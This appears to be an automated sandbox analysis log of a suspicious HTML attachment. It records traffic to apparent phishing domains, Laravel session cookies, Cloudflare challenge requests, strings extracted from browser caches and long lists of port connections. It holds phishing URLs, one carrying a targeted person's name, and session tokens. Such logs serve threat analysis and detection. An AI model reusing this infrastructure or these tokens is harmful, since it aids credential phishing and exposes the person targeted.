XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /staE25xquFIms1ubbV5xl8DLBnj3Wsk45GqF2Do244R3qvQUFMkQXp58H3Gfgh260 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /lvytc1gAYeGHFHs4NJuMNMax70PlgNRGw39kizb HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkI2T2dDNUQwOGtjZHgvV280cmFSMWc9PSIsInZhbHVlIjoibWFlWmRtNmxjclMwODU2cUkxVnBvZk5kZnhUc2dkMHlYN2hHUkRDYVVNWi9YL0pOQ095UG9zb3djaFdGcEg0NDlwS3VCU05wZ29IL2VoWGJYdWFDVEN1WjdONzB2NmFvZ2R3cG1ucGo2OHFJZGpYOGNGNm84TDkwYWw1OE9yTFMiLCJtYWMiOiIxMGExNzUyOTMxMWU3OThlNzUwZTNkZDVmNTEzYzY5MTc0MTM1MzM4YWUyMGVkN2I4MTg0NWViOWQ2MWQ2Y2U1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlRVZHZjVDlIL2c3dGRvVmV1K29oY1E9PSIsInZhbHVlIjoic1k1NWhINGJ4QnFrRW5HVDZzK0UzZTdvZlNITm1PNXpnNG1ZSEw2RTdJdXpjWm9XbVNsM21mNnowcEhoZUlobUlxMWFEUVNONGtseTZzVkdPb0g4dnZmeU85WGhlVWRvZVgwRmZycXZwbTdlejJIdjlsWk4zYmZrRHAwWCt1MkIiLCJtYWMiOiI5NTg3ZDMyOWI5NTY5Mzk4OThlNmY1NDk0ZjFjMjdmZGJmNTY4MjdjMTNmNzU4NmIxODBmNmM5MGQ5NWViY2UzIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=oOFFLGOpXKGaktU&MD=FTxB8uzd HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
      Source: global trafficDNS traffic detected: DNS query: href.li
      Source: global trafficDNS traffic detected: DNS query: kpl2.r04ar2.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: wox.dultzman.ru
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
      Source: global trafficDNS traffic detected: DNS query: github.com
      Source: global trafficDNS traffic detected: DNS query: ok4static.oktacdn.com
      Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
      Source: global trafficDNS traffic detected: DNS query: get.geojs.io
      Source: global trafficDNS traffic detected: DNS query: nse.idwp.ru
      Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1155709742:1724793999:jZYsAJ5BQ_g2p6ZQyC6e2YcpgeQ98hmygX8r-9lG55k/8b9f6497ee820fa4/ec492f91dc9d6a6 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 2714sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: ec492f91dc9d6a6sec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/idxkc/0x4AAAAAAAhuDbq9Zssi-YOu/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 22:10:45 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: jaKlFK3BepuLI+voImRbyOVd/bNVJiaaIpI=$QGcQQo53PKtghY9qcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8b9f64b7f8c7333c-EWRalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 22:10:50 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: uxjpHow3BxLijl2KIWMVfS7+6246QAjJtVk=$NfLhMSEhW/h3aItycache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8b9f64d74e3e4251-EWRalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 22:11:02 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: J1ZLfQTWm5Lqs5iuued80agSYRZWsObUFag=$roiI11/oz/7QOj4EServer: cloudflareCF-RAY: 8b9f6523c95443ac-EWRalt-svc: h3=":443"; ma=86400
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 22:11:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2B3Hwfm5URa0VIteODWMU8DrfSEvhq2TVdS8YuOi20LAechWtbpiyhuqmicuzV2Bgmk6g52Ft91M1q3K0Ga0TX76s19zPo9ucrgRAgL%2FcN5%2BeBG%2F84dvq1celzyB%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 8b9f65323f758c3f-EWR
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 22:11:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lm9UcMp9dJB3hFYO%2FGnnyiFDjvAPI%2Finfh1SgxU0wFgstOLNZ1tiduxrT78XsIlcVJ%2BTqjpztrSO4thClphqyCKNj540B5RtgWNmcYbBEBrL1Gm00Nu5EFEO6FWKpw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 8b9f655b1eb27d18-EWR
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 22:11:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sIxc%2BZUUEOrNpQDWB9EM7I7KmFejegSrUZkqAmRHFxitgwVo5ALHeTjQ8lJXvTyvY0hx3XK79w4PAfrQpGB%2FeUnI%2BYYGnE14edccKFBWCZEFC1LyJAV9TiVnbge89w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 8b9f6578fa270c9e-EWR
      Source: chromecache_170.2.dr, chromecache_195.2.drString found in binary or memory: http://github.com/fent/randexp.js/raw/master/LICENSE
      Source: chromecache_173.2.drString found in binary or memory: https://KPL2.r04ar2.com/KPL2/?em=natasha.hammond
      Source: ATT60255.HTMString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js
      Source: chromecache_165.2.dr, chromecache_183.2.drString found in binary or memory: https://cloud.google.com/contact
      Source: chromecache_165.2.dr, chromecache_183.2.drString found in binary or memory: https://cloud.google.com/recaptcha-enterprise/billing-information
      Source: chromecache_165.2.dr, chromecache_183.2.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca
      Source: chromecache_165.2.dr, chromecache_183.2.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#localhost_support
      Source: chromecache_165.2.dr, chromecache_183.2.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que
      Source: chromecache_170.2.dr, chromecache_195.2.drString found in binary or memory: https://github.com/fent)
      Source: chromecache_183.2.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
      Source: chromecache_183.2.drString found in binary or memory: https://recaptcha.net
      Source: chromecache_183.2.drString found in binary or memory: https://support.google.com/recaptcha
      Source: chromecache_165.2.dr, chromecache_183.2.drString found in binary or memory: https://support.google.com/recaptcha#6262736
      Source: chromecache_165.2.dr, chromecache_183.2.drString found in binary or memory: https://support.google.com/recaptcha/#6175971
      Source: chromecache_165.2.dr, chromecache_183.2.drString found in binary or memory: https://support.google.com/recaptcha/?hl=en#6223828
      Source: chromecache_212.2.dr, chromecache_165.2.dr, chromecache_189.2.dr, chromecache_183.2.drString found in binary or memory: https://www.google.com/recaptcha/api2/
      Source: chromecache_165.2.dr, chromecache_183.2.drString found in binary or memory: https://www.gstatic.c..?/recaptcha/releases/i7X0JrnYWy9Y_5EYdoFM79kV/recaptcha__.
      Source: chromecache_212.2.dr, chromecache_189.2.drString found in binary or memory: https://www.gstatic.com/recaptcha/releases/i7X0JrnYWy9Y_5EYdoFM79kV/recaptcha__en.js
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
      Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
      Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
      Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
      Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
      Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
      Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
